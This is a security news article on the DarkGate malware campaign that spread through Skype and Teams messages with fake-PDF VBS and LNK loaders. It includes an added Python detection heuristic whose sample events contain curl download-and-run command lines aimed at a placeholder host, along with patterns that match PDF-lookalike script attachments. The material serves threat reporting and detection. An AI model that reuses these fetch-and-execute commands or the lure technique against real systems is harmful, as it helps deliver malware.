Hackers Abusing Skype and Teams to Deliver the DarkGate Malware

Hackers used the Teams and Skype messaging platforms to spread the DarkGate malware to targeted businesses. To get DarkGate installed, a Visual Basic for Applications (VBA) loader script is delivered to victims.

The Windows-based malware known as DarkGate is capable of remote access to target endpoints, file encryption, cryptocurrency mining, and credential theft. It was first made public in 2018.


According to Trend Micro, DarkGate attacks were spotted in the Americas, followed closely by Asia, the Middle East, and Africa.


Distribution of the DarkGate campaign

To deploy and carry out its illicit capabilities, DarkGate also uses the automation and scripting tool AutoIt, which is designed for Windows. AutoIt is a genuine tool, but other malware families commonly utilize it to get through defenses and add an extra layer of obfuscation.

DarkGate Infection Chain Abusing Skype

The attacker used a hijacked Skype account to take over an existing conversation thread and send a message that looked like a PDF file but was in fact a malicious VBS script.

“The threat actor abused a trusted relationship between the two organizations to deceive the recipient into executing the attached VBA script”, researchers said.

Infection Chain

Because of this, the recipient recognized the sender as a member of a trusted external organization. Researchers observed that, in this case, the curl command was used to retrieve the legitimate AutoIt application and the associated malicious files.

Skype message with an embedded malicious attachment posing as a PDF file

Hackers Abusing Microsoft Teams Platform

Another instance involved a threat actor delivering a link through a Microsoft Teams message. Here the victim was exposed to the possibility of spam because the organization’s setup allowed users to receive notifications from outside senders.

Teams message with a malicious attachment

In the Teams version of the attack, the attackers concealed a .LNK file. The sample that abused Teams was sent by an unidentified external sender.

“The downloaded artifacts contained both a legitimate copy of AutoIt and a maliciously compiled AutoIt script file that contained the malicious capabilities of DarkGate,” researchers said.
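The two behaviours described above (a script attachment posing as a PDF, and a script host using curl to fetch and then run AutoIt) can be turned into a simple detection heuristic. The following is an added example, not code from the article or from Trend Micro's research; the event field names, file paths and URLs are constructed assumptions, not a vendor schema.

```python
import re

# Constructed sample: process-creation events mirroring the chain the
# article describes. Field names (pid, ppid, image, cmdline) are an
# assumption, not a vendor schema; paths and the URL are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\agreement.pdf.vbs"'},
    {"pid": 300, "ppid": 200, "image": "curl.exe",
     "cmdline": r"curl.exe -o C:\Temp\AutoIt3.exe http://example.invalid/a"},
    {"pid": 301, "ppid": 200, "image": "curl.exe",
     "cmdline": r"curl.exe -o C:\Temp\s.a3x http://example.invalid/b"},
    {"pid": 302, "ppid": 200, "image": "AutoIt3.exe",
     "cmdline": r"C:\Temp\AutoIt3.exe C:\Temp\s.a3x"},
    {"pid": 400, "ppid": 100, "image": "cmd.exe", "cmdline": "cmd.exe /c dir"},
]

# Interpreters a VBS lure or an .LNK-launched command normally runs under.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}

# "<name>.pdf.<script extension>": a script attachment posing as a PDF.
FAKE_PDF = re.compile(r"\.pdf\.(vbs|vbe|js|jse|wsf|lnk)$", re.IGNORECASE)


def is_fake_pdf(filename: str) -> bool:
    """True when an attachment name carries .pdf before a script extension."""
    return FAKE_PDF.search(filename) is not None


def detect_autoit_loader(events: list[dict]) -> list[str]:
    """Flag script hosts whose children download with curl and run AutoIt,
    and script hosts that were launched with a PDF-lookalike script."""
    children: dict[int, list[dict]] = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    alerts = []
    for e in events:
        if e["image"].lower() not in SCRIPT_HOSTS:
            continue
        kids = children.get(e["pid"], [])
        ran_curl = any(k["image"].lower() == "curl.exe" for k in kids)
        ran_autoit = any(k["image"].lower().startswith("autoit3") for k in kids)
        if ran_curl and ran_autoit:
            alerts.append(f"pid {e['pid']} ({e['image']}): curl download followed by AutoIt execution")
        if is_fake_pdf(e["cmdline"].strip('"')):
            alerts.append(f"pid {e['pid']} ({e['image']}): launched PDF-lookalike script")
    return alerts
```

Running `detect_autoit_loader(SAMPLE_EVENTS)` yields two alerts, both for the wscript.exe process; the unrelated cmd.exe child of explorer.exe is not flagged.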

Recommendation

Cybercriminals may use these payloads to spread malware such as cryptocurrency miners, info stealers, ransomware, and malicious and/or abusive remote management tools.

Organizations should keep control over the instant messaging applications in use so that policies such as blocking external domains, restricting attachments, and, where practical, scanning content can be enforced.

Multifactor authentication (MFA) is strongly advised for securing these apps in case legitimate credentials are compromised. This reduces the risk of attacks that use these methods spreading further.


Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.